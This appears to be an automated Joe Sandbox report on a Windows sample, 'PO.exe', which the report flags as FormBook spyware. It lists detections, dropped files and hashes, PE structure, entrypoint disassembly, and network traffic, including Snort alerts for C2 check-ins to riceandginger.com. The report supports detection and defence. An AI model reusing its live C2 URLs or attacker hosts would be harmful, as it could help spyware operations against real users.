          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
PO.exe | 16% | Virustotal | -
PO.exe | 15% | ReversingLabs | Win32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.PO.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.chkdsk.exe.2a5660.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
8.2.chkdsk.exe.54ef834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.PO.exe.2670000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.PO.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.riceandginger.com/fcn/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tourbuzz.net | 52.20.218.92 | true | false | - | high
riceandginger.com | 162.241.24.122 | true | true | - | unknown
www.deerokoj.com | 199.247.6.20 | true | true | - | unknown
www.665asilo.com | unknown | unknown | true | - | unknown
www.ayescarrental.com | unknown | unknown | true | - | unknown
www.riceandginger.com | unknown | unknown | true | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr | true | Avira URL Cloud: safe | unknown
www.riceandginger.com/fcn/ | true | Avira URL Cloud: safe | low

                      URLs from Memory and Binaries

Source for every row below: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | - | high
http://www.fontbureau.com | false | - | high
http://www.fontbureau.com/designersG | false | - | high
http://www.fontbureau.com/designers/? | false | - | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | - | high
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | - | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | - | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | - | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | - | high
http://www.fonts.com | false | - | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.247.6.20 | www.deerokoj.com | European Union | 20473 | AS-CHOOPAUS | true
162.241.24.122 | riceandginger.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                                          General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383909
Start date: 08.04.2021
Start time: 12:11:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.4% (good quality ratio 12.7%)
• Quality average: 77.3%
• Quality standard deviation: 28.2%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 23.54.113.53, 13.88.21.125, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.0.174.185, 23.0.174.200, 23.10.249.43, 23.10.249.26, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

Match | Associated Sample Name / URL | Detection | Context
162.241.24.122 | TRANSFER CONFIRMATION_PDF.exe | malicious | www.riceandginger.com/fcn/?nR-lCh=-ZkPgF4h0LuP&Bj4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwqJ/jNzuESGN

                                          Domains

Match | Associated Sample Name / URL | Detection | Context
tourbuzz.net | TT COPY.exe | malicious | 52.20.218.92
tourbuzz.net | h3dFAROdF3.exe | malicious | 52.20.218.92
tourbuzz.net | kqwqyoFz1C.exe | malicious | 52.20.218.92
tourbuzz.net | BsR85tOyjL.exe | malicious | 52.20.218.92
tourbuzz.net | PURCHASE_ORDER.xlsx | malicious | 52.20.218.92
tourbuzz.net | zISJXAAewo.exe | malicious | 52.20.218.92
tourbuzz.net | tDuLlLosre.exe | malicious | 52.20.218.92

                                          ASN

Match | Associated Sample Name / URL | Detection | Context
UNIFIEDLAYER-AS-1US | 0BAdCQQVtP.exe | malicious | 74.220.199.6
UNIFIEDLAYER-AS-1US | TazxfJHRhq.exe | malicious | 192.185.48.194
UNIFIEDLAYER-AS-1US | vbc.exe | malicious | 50.87.195.61
UNIFIEDLAYER-AS-1US | PRICE_QUOTATION_RFQ_000988_PDF.exe | malicious | 192.185.164.148
UNIFIEDLAYER-AS-1US | PaymentAdvice.exe | malicious | 198.57.149.44
UNIFIEDLAYER-AS-1US | PRC-20-518 ORIGINAL.xlsx | malicious | 162.241.61.249
UNIFIEDLAYER-AS-1US | Aveo 742.html | malicious | 162.241.124.93
UNIFIEDLAYER-AS-1US | Bridgestone 363.html | malicious | 162.241.124.93
UNIFIEDLAYER-AS-1US | nunu.exe | malicious | 192.185.162.134
UNIFIEDLAYER-AS-1US | GS_ PO NO.1862021.exe | malicious | 192.185.90.36
UNIFIEDLAYER-AS-1US | Payment Report.html | malicious | 192.185.195.15
UNIFIEDLAYER-AS-1US | receipt-xxxx.htm | malicious | 162.241.124.32
UNIFIEDLAYER-AS-1US | Order-027165.exe | malicious | 192.232.218.185
UNIFIEDLAYER-AS-1US | Ewkoo9igCN.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | 49Bvnq7iFK.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | OtOXfybCmW.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | Ewkoo9igCN.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | W3aLwWHvWB.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | IJh1SAcSNP.dll | malicious | 162.241.54.59
UNIFIEDLAYER-AS-1US | OtOXfybCmW.dll | malicious | 162.241.54.59
AS-CHOOPAUS | New Order.exe | malicious | 45.63.19.244
AS-CHOOPAUS | B of L - way bill return.exe | malicious | 45.32.111.89
AS-CHOOPAUS | RFQ#4734.exe | malicious | 108.61.161.76
AS-CHOOPAUS | winlog.dll | malicious | 45.63.27.162
AS-CHOOPAUS | xqtEOiEeHh.exe | malicious | 207.246.80.14
AS-CHOOPAUS | nnrlOwKZlc.exe | malicious | 207.246.80.14
AS-CHOOPAUS | Balance payment..exe | malicious | 140.82.59.108
AS-CHOOPAUS | KEyjMfJJQj | malicious | 155.138.211.25
AS-CHOOPAUS | XQ2fszii3u | malicious | 155.138.211.25
AS-CHOOPAUS | 7sZvYxFtN3.exe | malicious | 45.76.56.26
AS-CHOOPAUS | 2021-04-01.exe | malicious | 140.82.28.50
AS-CHOOPAUS | deIt7iuD1y.exe | malicious | 104.207.148.92
AS-CHOOPAUS | E1PyFynLfp.exe | malicious | 136.244.96.52
AS-CHOOPAUS | hfGKHMTTDR.exe | malicious | 207.246.80.14
AS-CHOOPAUS | cMOtS8JQVW.exe | malicious | 207.246.80.14
AS-CHOOPAUS | diagnostic.exe | malicious | 45.76.172.113
AS-CHOOPAUS | l4gLNU4NcA.exe | malicious | 45.63.42.1
AS-CHOOPAUS | ekdCcEl5KV.exe | malicious | 207.246.80.14
AS-CHOOPAUS | 4FNTlzlu10.exe | malicious | 207.246.80.14
AS-CHOOPAUS | SecuriteInfo.com.Trojan.Siggen12.58144.411.exe | malicious | 45.76.53.14

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

C:\Users\user\AppData\Local\Temp\0qs5eq4gqxghkspsiz
Process: C:\Users\user\Desktop\PO.exe
File Type: data
Category: dropped
Size (bytes): 185856
Entropy (8bit): 7.999002923208001
Encrypted: true
SSDEEP: 3072:hfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHRL/Wdy:hfhvaR6JxBZNxFSGScP7NloKFHRTH
MD5: C76B2A549514C1B2E11142566992D07A
SHA1: 79FEF3B446A7732B091745B111A0C73F82DE5DBB
SHA-256: CE5B3CE5686E894A949D127B10FE27382F4737E4DF7B724269D669468434ADF8
SHA-512: 70AEF1C4093FB27FB434E4A28B96E914C2A0CEE46CB9982F4E596E9D285A1DF59766354058D28A9DD73BAA3CD24AE3D4086C82AA42C82620F6039CCB36C625B8
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\4hohyb48e3wlzft
Process: C:\Users\user\Desktop\PO.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.963332317122046
Encrypted: false
SSDEEP: 96:kBksH+WPGZ9ImHb+KxkeDGwERGvqpW+LNd4YgLv8dYA53lmJolxQtxvz:1WytHb3ilqqpWUddg78uA+JoletNz
MD5: 8903F1E0C84D25A97CDA24636A27ED23
SHA1: F6941D060997F540B06D6C6C85B9B56B23549DBC
SHA-256: AE70E7DDAE9D864DD18CF6CDC1DC64C918B1FC01254C5AF6AA7DB3D1596E0010
SHA-512: 5FAE1B044DABB5E99607C4F76C8D8C661DAE754BC711074447646874CC70F179AFDB94B8770F1649197B4C118E9119EB61050A0F06184F407BE509257B09DDBB
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
Process: C:\Users\user\Desktop\PO.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 4.091011953873825
Encrypted: false
SSDEEP: 48:vpggDzDVKAxlyNHvPviTLNuLebdsbriB4ZYmRSs:BTzxlivPvinktfiuZVR
MD5: A622545967851FAF0405E20376399ACB
SHA1: 8000D6463895519F16325B7901321247A1C84D22
SHA-256: 06A5FAD63869EF665B9E99BAEA58BCE3BB59E85D19D744D53D0E70F58738FF32
SHA-512: 939213666AA71DBE3EF9D747216A0BC959E11151AA56CFDE7CEECE6BE5EE13BBC3488F34259D6824D4B7126907A616CC172864840707619FF91B271B093C59CC
Malicious: false
Reputation: low

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.919251123380622
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PO.exe
                                          File size:227498
                                          MD5:ba83b33d39ca6c3bf1f311d1b6a38d1a
                                          SHA1:ce0bcbb882b1a2105138b9955c1d892e4c6f0947
                                          SHA256:ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
                                          SHA512:e251a936be79eed23d04874324be745090919af5ab7ee95310c06d8877f943fadc9752c38db70a5f0e7d3799e4f89f471233c96d18b92c12dab9bf78f59d2b13
                                          SSDEEP:3072:HyewmN4skJ6MWjfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHO:HdrfhvaR6JxBZNxFSGScP7NloKFHRTs

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40314a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 0000017Ch
                                          push ebx
                                          push ebp
                                          push esi
                                          xor esi, esi
                                          push edi
                                          mov dword ptr [esp+18h], esi
                                          mov ebp, 00409240h
                                          mov byte ptr [esp+10h], 00000020h
                                          call dword ptr [00407030h]
                                          push esi
                                          call dword ptr [00407270h]
                                          mov dword ptr [007A3030h], eax
                                          push esi
                                          lea eax, dword ptr [esp+30h]
                                          push 00000160h
                                          push eax
                                          push esi
                                          push 0079E540h
                                          call dword ptr [00407158h]
                                          push 00409230h
                                          push 007A2780h
                                          call 00007FB80CD18308h
                                          mov ebx, 007AA400h
                                          push ebx
                                          push 00000400h
                                          call dword ptr [004070B4h]
                                          call 00007FB80CD15A49h
                                          test eax, eax
                                          jne 00007FB80CD15B06h
                                          push 000003FBh
                                          push ebx
                                          call dword ptr [004070B0h]
                                          push 00409228h
                                          push ebx
                                          call 00007FB80CD182F3h
                                          call 00007FB80CD15A29h
                                          test eax, eax
                                          je 00007FB80CD15C22h
                                          mov edi, 007A9000h
                                          push edi
                                          call dword ptr [00407140h]
                                          call dword ptr [004070ACh]
                                          push eax
                                          push edi
                                          call 00007FB80CD182B1h
                                          push 00000000h
                                          call dword ptr [00407108h]
                                          cmp byte ptr [007A9000h], 00000022h
                                          mov dword ptr [007A2F80h], eax
                                          mov eax, edi
                                          jne 00007FB80CD15AECh
                                          mov byte ptr [esp+10h], 00000022h
                                          mov eax, 00000001h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                           .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                           .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                           Name | RVA | Size | Type | Language | Country
                                           RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
                                           RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
                                           RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
                                           RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
                                           RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
                                           RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                          Imports

                                           DLL | Import
                                           KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                           USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                           GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                           SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                           ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                           COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                           ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                           VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                          Possible Origin

                                           Language of compilation system | Country where language is spoken
                                           English | United States

                                          Network Behavior

                                          Snort IDS Alerts

                                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                           04/08/21-12:14:02.069664 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           04/08/21-12:14:02.069664 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           04/08/21-12:14:02.069664 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 162.241.24.122

                                          Network Port Distribution

                                          TCP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Apr 8, 2021 12:13:40.544469118 CEST | 49725 | 80 | 192.168.2.5 | 199.247.6.20
                                           Apr 8, 2021 12:13:40.562431097 CEST | 80 | 49725 | 199.247.6.20 | 192.168.2.5
                                           Apr 8, 2021 12:13:41.064224005 CEST | 49725 | 80 | 192.168.2.5 | 199.247.6.20
                                           Apr 8, 2021 12:13:41.082194090 CEST | 80 | 49725 | 199.247.6.20 | 192.168.2.5
                                           Apr 8, 2021 12:13:41.595515013 CEST | 49725 | 80 | 192.168.2.5 | 199.247.6.20
                                           Apr 8, 2021 12:13:41.613816023 CEST | 80 | 49725 | 199.247.6.20 | 192.168.2.5
                                           Apr 8, 2021 12:14:01.927160978 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           Apr 8, 2021 12:14:02.069130898 CEST | 80 | 49727 | 162.241.24.122 | 192.168.2.5
                                           Apr 8, 2021 12:14:02.069335938 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           Apr 8, 2021 12:14:02.069664001 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           Apr 8, 2021 12:14:02.211385965 CEST | 80 | 49727 | 162.241.24.122 | 192.168.2.5
                                           Apr 8, 2021 12:14:02.566215038 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           Apr 8, 2021 12:14:02.752856016 CEST | 80 | 49727 | 162.241.24.122 | 192.168.2.5
                                           Apr 8, 2021 12:14:04.872277021 CEST | 80 | 49727 | 162.241.24.122 | 192.168.2.5
                                           Apr 8, 2021 12:14:04.872505903 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122
                                           Apr 8, 2021 12:14:04.872608900 CEST | 80 | 49727 | 162.241.24.122 | 192.168.2.5
                                           Apr 8, 2021 12:14:04.872714996 CEST | 49727 | 80 | 192.168.2.5 | 162.241.24.122

                                          UDP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Apr 8, 2021 12:12:06.178884983 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:06.191783905 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:08.048573971 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:08.061793089 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:08.770917892 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:08.783648968 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:08.987853050 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:09.006052971 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:10.268135071 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:10.281533957 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:11.804956913 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:11.817466021 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:12.743650913 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:12.756333113 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:13.563091040 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:13.575824022 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:14.841455936 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:14.853894949 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:15.754436970 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:15.767277956 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:17.557957888 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:17.571839094 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:21.269838095 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:21.282497883 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:32.977138996 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:32.995311975 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:12:52.821908951 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:12:52.835186958 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:01.819839954 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:01.838418007 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:04.264900923 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:04.286134005 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
